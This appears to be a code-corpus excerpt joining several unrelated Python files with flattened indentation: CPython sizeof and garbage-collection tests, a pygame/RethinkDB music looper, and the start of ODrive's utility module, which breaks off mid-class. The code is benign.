# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
main.py | import pygame
import time
import threading
import rethinkdb as r
# 1 ... 6
TIME = 0.2
LENGTH_OF_MUSIC_LINE = 10
content = [[] for i in range(LENGTH_OF_MUSIC_LINE)]
#music = {"content": [[0], [0, 1], [0], [0, 1], [0], [0, 1], [1], [0, 2]]}
music = {"content": content}
pygame.mixer.pre_init(44100, -16, 2, 2048)
pygame.init()
sounds = {}
def playingLoop(music):
# Cheap but working
r.connect("localhost", 28015).repl()
currentState = 0
while True:
count = 0
print '---'
for state in music['content']:
print count, state
for i in state:
sounds[i].play()
time.sleep(0.3)
# Here, add the current cursor control
r.db("echoes").table("music").update({"current": currentState}).run()
currentState += 1
if currentState > 9:
currentState = 0
print currentState
count += 1
def dbDump(music):
r.connect("localhost", 28015).repl()
cursor = r.db("echoes").table("music").changes().run()
for document in cursor:
music['content'] = document['new_val']['content']
print document['new_val']
#pygame.mixer.music.load()
for i in range(13):
try:
filename = 'sound' + str(i+1) + '.ogg'
print 'Charging ' + filename + " ..."
sounds[i] = pygame.mixer.Sound(filename)
#sounds[3] = pygame.mixer.Sound("hihat2.wav")
except Exception as e:
print e
continue
modifierDB = threading.Thread(target=dbDump, args=(music,))
loopT = threading.Thread(target=playingLoop, args=(music,))
loopT.start()
modifierDB.start()
|
test_gc.py | import unittest
from test.support import verbose, run_unittest
from test import support
import sys
import gc
import weakref
import time
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
### Tests
###############################################################################
class GCTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
#since gc module already exists, it would not be caught by monitorGlobal.
#so we have to monitor it manually:
gc.monitorObject(gc)
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
except Exception:
pass
@classmethod
def tearDownClass(cls):
#Jython-specific block:
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec(("def f(): pass\n"), d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
col = gc.collect()
self.assertEqual(col, 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
@unittest.skipIf(support.is_jython,
'''
Jython neither supports disabling/enabling the gc, nor
setting the gc threshold.
''')
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
@unittest.skipIf(support.is_jython,
'''
Jython neither supports disabling/enabling the gc, nor
setting the gc threshold.
''')
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example:
# - disposed tuples are not freed, but reused
# - the call to assertEqual somehow avoids building its args tuple
@unittest.skipIf(support.is_jython,
'''
Jython does not support to interrogate gc-internal
generation-wise counters.
''')
def test_get_count(self):
# Avoid future allocation of method object
assertEqual = self._baseAssertEqual
gc.collect()
assertEqual(gc.get_count(), (0, 0, 0))
a = dict()
# since gc.collect(), we created two objects:
# the dict, and the tuple returned by get_count()
assertEqual(gc.get_count(), (2, 0, 0))
@unittest.skipIf(support.is_jython,
'''
Jython does not support to interrogate gc-internal
generation-wise counters.
''')
def test_collect_generations(self):
# Avoid future allocation of method object
assertEqual = self.assertEqual
gc.collect()
a = dict()
gc.collect(0)
assertEqual(gc.get_count(), (0, 1, 0))
gc.collect(1)
assertEqual(gc.get_count(), (0, 0, 1))
gc.collect(2)
assertEqual(gc.get_count(), (0, 0, 0))
@unittest.skipIf(support.is_jython,
'''
While this test passes in Jython, it leads to internal
allocation failures because of the massive referencing
in this test. To keep the JVM-process healthy and to
avoid subsequent failures due to bad conditions caused
by this test, we skip it for now.
''')
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
try:
gc.disable()
except NotImplementedError:
#i.e. Jython is running (or other non-CPython interpreter without gc-disabling)
pass
@unittest.skipIf(support.is_jython,
'''
Jython does not have a trashcan mechanism.
This test should still not fail but currently does.
This is because the massive referencing in this test brings
sync gc emulation to its limit. Making this more robust is
of no priority for now.
''')
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_checkinterval = sys.getcheckinterval()
sys.setcheckinterval(3)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(0.01)
exit = True
for t in threads:
t.join()
finally:
pass
sys.setcheckinterval(old_checkinterval)
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = sorted(gc.get_referents(alist))
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray("a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class OldStyle:
pass
class NewStyle(object):
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(OldStyle))
self.assertTrue(gc.is_tracked(OldStyle()))
self.assertTrue(gc.is_tracked(NewStyle))
self.assertTrue(gc.is_tracked(NewStyle()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
@unittest.skipIf(support.is_jython,
'''
GCTogglingTests are neither relevant nor applicable for Jython.
''')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
try:
gc.disable()
assert not gc.isenabled()
except NotImplementedError:
pass
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
unittest.main()
|
utils.py | from __future__ import print_function
import sys
import time
import threading
import platform
import subprocess
import os
import numpy as np
import matplotlib.pyplot as plt
from fibre.utils import Event
import odrive.enums
from odrive.enums import *
try:
if platform.system() == 'Windows':
import win32console
import colorama
colorama.init()
except ImportError:
print("Could not init terminal features.")
print("Refer to install instructions at http://docs.odriverobotics.com/#downloading-and-installing-tools")
sys.stdout.flush()
pass
if sys.version_info < (3, 0):
input = raw_input
_VT100Colors = {
'green': '\x1b[92;1m',
'cyan': '\x1b[96;1m',
'yellow': '\x1b[93;1m',
'red': '\x1b[91;1m',
'default': '\x1b[0m'
}
def calculate_thermistor_coeffs(degree, Rload, R_25, Beta, Tmin, Tmax, plot = False):
T_25 = 25 + 273.15 #Kelvin
temps = np.linspace(Tmin, Tmax, 1000)
tempsK = temps + 273.15
# https://en.wikipedia.org/wiki/Thermistor#B_or_%CE%B2_parameter_equation
r_inf = R_25 * np.exp(-Beta/T_25)
R_temps = r_inf * np.exp(Beta/tempsK)
V = Rload / (Rload + R_temps)
fit = np.polyfit(V, temps, degree)
p1 = np.poly1d(fit)
fit_temps = p1(V)
if plot:
print(fit)
plt.plot(V, temps, label='actual')
plt.plot(V, fit_temps, label='fit')
plt.xlabel('normalized voltage')
plt.ylabel('Temp [C]')
plt.legend(loc=0)
plt.show()
return p1
class OperationAbortedException(Exception):
pass
def set_motor_thermistor_coeffs(axis, Rload, R_25, Beta, Tmin, TMax):
coeffs = calculate_thermistor_coeffs(3, Rload, R_25, Beta, Tmin, TMax)
axis.motor_thermistor.config.poly_coefficient_0 = float(coeffs[3])
axis.motor_thermistor.config.poly_coefficient_1 = float(coeffs[2])
axis.motor_thermistor.config.poly_coefficient_2 = float(coeffs[1])
axis.motor_thermistor.config.poly_coefficient_3 = float(coeffs[0])
def dump_errors(odrv, clear=False):
axes = [(name, axis) for name, axis in odrv._remote_attributes.items() if 'axis' in name]
axes.sort()
for name, axis in axes:
print(name)
# Flatten axis and submodules
# (name, remote_obj, errorcode)
module_decode_map = [
('axis', axis, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("AXIS_ERROR_")}),
('motor', axis.motor, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("MOTOR_ERROR_")}),
('fet_thermistor', axis.fet_thermistor, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("THERMISTOR_CURRENT_LIMITER_ERROR")}),
('motor_thermistor', axis.motor_thermistor, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("THERMISTOR_CURRENT_LIMITER_ERROR")}),
('encoder', axis.encoder, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("ENCODER_ERROR_")}),
('controller', axis.controller, {k: v for k, v in odrive.enums.__dict__ .items() if k.startswith("CONTROLLER_ERROR_")}),
]
# Module error decode
for name, remote_obj, errorcodes in module_decode_map:
prefix = ' '*2 + name + ": "
if (remote_obj.error != 0):
foundError = False
print(prefix + _VT100Colors['red'] + "Error(s):" + _VT100Colors['default'])
errorcodes_tup = [(name, val) for name, val in errorcodes.items() if 'ERROR_' in name]
for codename, codeval in errorcodes_tup:
if remote_obj.error & codeval != 0:
foundError = True
print(" " + codename)
if not foundError:
print(" " + 'UNKNOWN ERROR!')
if clear:
remote_obj.error = 0
else:
print(prefix + _VT100Colors['green'] + "no error" + _VT100Colors['default'])
def oscilloscope_dump(odrv, num_vals, filename='oscilloscope.csv'):
with open(filename, 'w') as f:
for x in range(num_vals):
f.write(str(odrv.get_oscilloscope_val(x)))
f.write('\n')
data_rate = 100
plot_rate = 10
num_samples = 1000
def start_liveplotter(get_var_callback):
"""
Starts a liveplotter.
The variable that is plotted is retrieved from get_var_callback.
This function returns immediately and the liveplotter quits when
the user closes it.
"""
import matplotlib.pyplot as plt
cancellation_token = Event()
global vals
vals = []
def fetch_data():
global vals
while not cancellation_token.is_set():
try:
data = get_var_callback()
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
vals.append(data)
if len(vals) > num_samples:
vals = vals[-num_samples:]
time.sleep(1/data_rate)
# TODO: use animation for better UI performance, see:
# https://matplotlib.org/examples/animation/simple_anim.html
def plot_data():
global vals
plt.ion()
# Make sure the script terminates when the user closes the plotter
def did_close(evt):
cancellation_token.set()
fig = plt.figure()
fig.canvas.mpl_connect('close_event', did_close)
while not cancellation_token.is_set():
plt.clf()
plt.plot(vals)
plt.legend(list(range(len(vals))))
fig.canvas.draw()
fig.canvas.start_event_loop(1/plot_rate)
fetch_t = threading.Thread(target=fetch_data)
fetch_t.daemon = True
fetch_t.start()
plot_t = threading.Thread(target=plot_data)
plot_t.daemon = True
plot_t.start()
return cancellation_token;
#plot_data()
class BulkCapture:
'''
Asynchronously captures a bulk set of data when instance is created.
get_var_callback: a function that returns the data you want to collect (see the example below)
data_rate: Rate in hz
length: Length of time to capture in seconds
Example Usage:
capture = BulkCapture(lambda :[odrv0.axis0.encoder.pos_estimate, odrv0.axis0.controller.pos_setpoint])
# Do stuff while capturing (like sending position commands)
capture.event.wait() # When you're done doing stuff, wait for the capture to be completed.
print(capture.data) # Do stuff with the data
capture.plot_data() # Helper method to plot the data
'''
def __init__(self,
get_var_callback,
data_rate=500.0,
duration=2.0):
from threading import Event, Thread
import numpy as np
self.get_var_callback = get_var_callback
self.event = Event()
def loop():
vals = []
start_time = time.monotonic()
period = 1.0 / data_rate
while time.monotonic() - start_time < duration:
try:
